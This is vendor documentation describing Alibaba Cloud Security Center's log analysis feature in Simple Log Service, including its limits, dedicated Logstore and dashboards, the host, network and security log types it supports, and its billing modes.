Alibaba Cloud Simple Log Service and Security Center jointly launch the log analysis feature that allows you to collect, query, analyze, transform, and consume risk data in real time. You can use the log analysis feature to monitor and handle potential risks of servers and implement centralized management of cloud resources. This topic describes the assets, billing, and limits of the log analysis feature.
Limits
You can write only Security Center logs to the dedicated Logstore. You cannot modify the attributes of the Logstore, such as the log retention period.
Security Center logs must be retained for at least 180 days to comply with the Cybersecurity Law of the People's Republic of China. We recommend that you allocate a log storage capacity of 40 GB for each server.
Security Center Basic Edition does not support the log analysis feature. Security Center Ultimate Edition and Enterprise Edition support query for network logs, security logs, and host logs. Security Center Advanced Edition and Anti-virus Edition support query for security logs and host logs. For more information about the billing of these editions, see Billing overview.
Assets
Dedicated project and Logstore
After you enable the log analysis feature, Simple Log Service creates a project named sas-log-Alibaba Cloud account ID-Region ID and a dedicated Logstore named sas-log by default. The following table describes the regions.
Region of Security Center
Region of the Simple Log Service project
China
China (Hangzhou)
Outside China
Singapore
ImportantDo not delete the project or Logstore that is related to Security Center logs. Otherwise, Security Center logs cannot be sent to Simple Log Service.
If you accidentally delete the dedicated Logstore, you are prompted that the sas-log Logstore does not exist, and all log data in the Logstore is deleted. In this case, submit a ticket to restore the Logstore. If you re-enable the log analysis feature after the Logstore is restored, the lost logs cannot be restored.
If you have enabled the pay-by-ingested-data billing mode, Simple Log Service creates a dedicated Logstore that uses the pay-by-ingested-data billing mode by default. If you want to switch the billing mode from pay-by-ingested-data to pay-by-feature, you can modify the configuration of the Logstore. For more information, see Modify the configurations of a Logstore.
Dedicated dashboards
Security Center logs are classified into three types. After you enable the log analysis feature of Security Center, Simple Log Service generates nine dashboards by default.
ImportantWe recommend that you do not make changes to the dedicated dashboards because the dashboards may be upgraded or updated at any time. You can create a custom dashboard to display query results. For more information, see Create a dashboard.
Supported log types
Security Center Enterprise Edition and Ultimate Edition support 16 subtypes of logs that belong to the host, security, and network log types. Security Center Anti-virus Edition and Advanced Edition support 12 subtypes of logs that belong to the host and security log types.
Network log types
Log type | __topic__ | Description | Collection cycle |
sas-log-http | Logs of user requests to web servers and responses from the web servers, including the IP address of the user, request time, request method, request URL, HTTP status code, and response size. Web access logs are used to analyze web traffic and user behavior, identify access patterns and exceptions, and optimize website performance. | In most cases, logs are collected 1 to 12 hours after the logs are generated. | |
sas-log-dns | Logs of DNS resolution details, including the requested domain name, query type, IP address of the client, and response value. You can monitor the request and response process of DNS resolution, and identify abnormal resolution behavior, DNS hijacking, and DNS poisoning based on DNS logs. | ||
local-dns | Logs of DNS queries and responses on the local DNS server, including the requested domain name, query type, IP address of the client, and response value. You can obtain the information about DNS queries in your network, and identify issues such as abnormal query behavior, domain hijacking, and DNS poisoning based on internal DNS logs. | ||
sas-log-session | Logs of network connections and data transmission, including the details of network sessions. The details include the session start time, source IP address, destination IP address, protocol, and ports. Network session logs are generally used to monitor network traffic, identify potential threats, and optimize network performance. |
Host log types
Log type | __topic__ | Description | Collection cycle |
aegis-log-login | Logs of user logons to servers, including the logon time, logon user, logon method, and logon IP address. Logon logs can help you monitor user activities, and identify and respond to abnormal behavior at the earliest opportunity. This helps ensure system security. Note Security Center does not collect the logs of logons to servers that run Windows Server 2008. | Logs are collected in real time. | |
aegis-log-network | Logs of network connections, including the 5-tuples of connections to servers, connection time, and connection status. Network connection logs can help you detect suspicious connections, identify potential network attacks, and optimize network performance. Note
| Logs are collected in real time. | |
aegis-log-process | Logs of server process startups, including the startup time, startup command, and parameters. You can obtain the startup status and configurations of server processes, and identify issues such as abnormal processes, malware intrusion, and threats based on process startup logs. | Logs are collected in real time. When a process starts, the logs are immediately collected. | |
aegis-log-crack | Logs of brute-force attacks, including information about logon attempts, and attempts to crack systems, applications, or accounts. You can obtain the information about brute-force attacks on systems or applications, and identify unusual logon attempts, weak passwords, and credential leaks based on brute-force attack logs. You can also use brute-force attack logs to trace malicious users and collect evidence to assist the security team in incident response and investigation. | Logs are collected in real time. | |
aegis-snapshot-host | Logs of accounts in systems or applications, including the basic information about accounts. The basic information includes the username, password policy, and logon history of an account. You can obtain the changes of accounts and identify potential risks at the earliest opportunity by comparing the account snapshot logs at different points in time. The risks include access from unauthorized accounts and abnormal account status. |
| |
aegis-snapshot-port | Logs of network connections, including the 5-tuples of connections, connection status, and associated processes. You can obtain the information about network sockets in the system, identify abnormal connections and potential network attacks, and optimize network performance based on network snapshot logs. | ||
aegis-snapshot-process | Logs of processes in the system, including the process ID, process name, and process start time. You can obtain the information about processes in the system and resource usage of the processes, and identify issues such as abnormal processes, excessive CPU utilization, and memory leaks based on process snapshot logs. | ||
aegis-log-dns-query | Logs of DNS requests sent by servers, including the requested domain name, query type, and query source. You can obtain the information about DNS queries in the network, and identify issues such as abnormal queries, domain hijacking, and DNS poisoning based on DNS request logs. | Logs are collected in real time. | |
aegis-log-client | Logs of online and offline events of the Security Center agent. | Logs are collected in real time. |
Security log types
Log type | __topic__ | Description | Collection cycle |
sas-vul-log | Logs of vulnerabilities that are detected in the systems or applications, including the vulnerability name, vulnerability status, and handling action. You can obtain the information about the vulnerabilities, security risks, and attack trends in the system, and take proper measures at the earliest opportunity based on vulnerability logs. | Logs are collected in real time. | |
sas-hc-log | Logs of baseline check results, including the baseline severity, baseline type, and risk level. You can obtain the baseline security status and potential risks in the system based on baseline logs. Note The logs record only the data of check items that fail the check the first time and the data of the check items that have passed the previous checks but failed a new check. | ||
sas-security-log | Logs of security events and alerts generated in the system and applications, including the alert data source, alert detail, and alert level. You can obtain the security events and threats in the system and take proper measures at the earliest opportunity based on alert logs. | ||
sas-cspm-log | Logs related to configuration assessment, including the check results of configuration assessment and the operations that add risk items to the whitelist. You can obtain the information about the errors and potential risks in the configurations of cloud services based on configuration assessment logs. | ||
sas-net-block | Logs of network attack events, including key information such as the attack type, source IP address, and destination IP address. You can obtain network security events and implement proper response and defense measures to improve network security and reliability based on network defense logs. | ||
sas-rasp-log | Logs of attacks on applications, including key information such as the attack type, attack pattern, and attacker IP address. You can obtain the information about the security events that occur in applications and implement proper response and defense measures to improve application security and reliability based on application protection logs. | ||
sas-filedetect-log | Logs of malicious file detection, including the file information, detection scenario, and detection result. You can identify common viruses such as ransomware and mining programs in offline files and Object Storage Service (OSS) objects, and handle the viruses at the earliest opportunity to prevent the spread and execution of malicious files based on the logs. |
Billing
If the pay-by-feature billing mode is used for the dedicated Logstore, you are not charged for the read and write traffic, index traffic, storage, number of shards, or number of read and write operations in the dedicated Logstore. You are charged for Internet traffic, data transformation, and data shipping. The fees are included in the bills of Simple Log Service. For more information, see Billable items of pay-by-feature.
If the dedicated Logstore uses the pay-by-ingested-data billing mode, you are not charged for the read and write traffic, index traffic, storage, number of shards, number of read and write operations, data transformation, or data shipping in the dedicated Logstore. You are charged only for read traffic over the Internet. The fees are included in the bills of Simple Log Service. For more information, see Billable items of pay-by-ingested-data.
The fees that are generated for the log analysis feature are included in the bills of Security Center. For more information, see Billing overview.
References
For more information about how to enable the log analysis feature of Security Center, see Enable the log analysis feature.
For more information about fields in Security Center logs, see Log fields.